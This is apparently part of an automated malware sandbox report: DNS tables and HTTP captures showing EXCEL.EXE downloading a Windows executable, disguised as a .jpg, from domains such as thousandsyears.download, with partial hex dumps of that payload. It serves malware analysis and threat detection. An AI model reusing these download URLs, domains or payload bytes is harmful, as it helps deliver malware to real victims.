                                                                                                                                                                                                                Jul 6, 2021 15:17:30.534708023 CEST192.168.2.228.8.8.80xc330Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.900122881 CEST192.168.2.228.8.8.80x8766Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.974066973 CEST192.168.2.228.8.8.80x4177Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.020195961 CEST192.168.2.228.8.8.80x96ceStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.213159084 CEST192.168.2.228.8.8.80x45a5Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.092585087 CEST192.168.2.228.8.8.80xbb9fStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.215624094 CEST192.168.2.228.8.8.80xa14dStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.298192024 CEST192.168.2.228.8.8.80xa456Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.370820045 CEST192.168.2.228.8.8.80x8e4aStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.599623919 CEST192.168.2.228.8.8.80x916aStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.663353920 CEST192.168.2.228.8.8.80x6005Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.283243895 CEST8.8.8.8192.168.2.220x1168No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.283243895 CEST8.8.8.8192.168.2.220x1168No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.507091999 CEST8.8.8.8192.168.2.220xc896No error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.507091999 CEST8.8.8.8192.168.2.220xc896No error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.731672049 CEST8.8.8.8192.168.2.220x2c09No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.731672049 CEST8.8.8.8192.168.2.220x2c09No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.511235952 CEST8.8.8.8192.168.2.220xaa88No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.511235952 CEST8.8.8.8192.168.2.220xaa88No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.511235952 CEST8.8.8.8192.168.2.220xaa88No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.597353935 CEST8.8.8.8192.168.2.220xc330No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.597353935 CEST8.8.8.8192.168.2.220xc330No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.597353935 CEST8.8.8.8192.168.2.220xc330No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.960684061 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.960684061 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:32.042804956 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:32.042804956 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.085537910 CEST8.8.8.8192.168.2.220x96ceNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.085537910 CEST8.8.8.8192.168.2.220x96ceNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.085537910 CEST8.8.8.8192.168.2.220x96ceNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.270649910 CEST8.8.8.8192.168.2.220x45a5No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.270649910 CEST8.8.8.8192.168.2.220x45a5No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.270649910 CEST8.8.8.8192.168.2.220x45a5No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.148252964 CEST8.8.8.8192.168.2.220xbb9fNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.148252964 CEST8.8.8.8192.168.2.220xbb9fNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.277646065 CEST8.8.8.8192.168.2.220xa14dNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.277646065 CEST8.8.8.8192.168.2.220xa14dNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.353192091 CEST8.8.8.8192.168.2.220xa456No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.353192091 CEST8.8.8.8192.168.2.220xa456No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.353192091 CEST8.8.8.8192.168.2.220xa456No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.431219101 CEST8.8.8.8192.168.2.220x8e4aNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.431219101 CEST8.8.8.8192.168.2.220x8e4aNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.431219101 CEST8.8.8.8192.168.2.220x8e4aNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.655723095 CEST8.8.8.8192.168.2.220x916aNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.655723095 CEST8.8.8.8192.168.2.220x916aNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.720768929 CEST8.8.8.8192.168.2.220x6005No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.720768929 CEST8.8.8.8192.168.2.220x6005No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)

                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                • thousandsyears.download
                                                                                                                                                                                                                • voopeople.fun
                                                                                                                                                                                                                • uppercilio.fun
                                                                                                                                                                                                                • astrocycle.download

                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                0192.168.2.2249167172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.331195116 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                Host: thousandsyears.download
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381211996 CEST2INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 13:17:29 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 57856
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                Age: 4879
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=i0kzsemsL1TC8MB6uCpUwDzwGX0%2FKAbNmMgbh1aDEsuXNVR3mdO19j2dvEAu8BDtRshDIvrDCcOwF7MA29XgX%2FqaTyP9YQhEA%2Bit%2B4JyNFuvbBxjkydL8XgvPwc7BZHkh0NqS4g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 66a91d1289044e3d-FRA
                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381242037 CEST3INData Raw: 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: @@
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381264925 CEST4INData Raw: b4 5a f6 89 05 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00
                                                                                                                                                                                                                Data Ascii: Zk$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@H
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381288052 CEST6INData Raw: 89 84 24 90 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84
                                                                                                                                                                                                                Data Ascii: $H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$l
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381308079 CEST7INData Raw: 00 0f b7 84 24 b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00
                                                                                                                                                                                                                Data Ascii: $$D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381330967 CEST8INData Raw: 00 00 00 48 89 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24
                                                                                                                                                                                                                Data Ascii: Ht$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381350994 CEST10INData Raw: 00 00 48 8b 94 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24
                                                                                                                                                                                                                Data Ascii: H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLH
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381375074 CEST11INData Raw: 00 00 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00
                                                                                                                                                                                                                Data Ascii: D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381392002 CEST13INData Raw: 86 00 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00
                                                                                                                                                                                                                Data Ascii: HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.381407976 CEST14INData Raw: 0f b7 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe
                                                                                                                                                                                                                Data Ascii: JDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.382090092 CEST16INData Raw: 48 8b 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00
                                                                                                                                                                                                                Data Ascii: HL$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                1192.168.2.2249168172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.547602892 CEST63OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                Host: voopeople.fun
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.613854885 CEST64INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 13:17:29 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 57856
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                Age: 4878
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=F4JnMbyIZ4oVgBLAZzFUjnbaoPbWp6MTsRFAiSjlHmVjsW4crOwB9Qtqa39C1CgY0n7cwXYW%2FRX1B4ejCGWhxziAOZluAHqVAB6Omf%2F8PPeRkKDb4JfI0TLvaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 66a91d13dc1d2c22-FRA
                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.613878012 CEST66INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: @@
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.613894939 CEST67INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                                                Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.613910913 CEST68INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                                Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.613960981 CEST70INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                                                Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.613980055 CEST71INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                                                Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.614012003 CEST73INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                                                Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
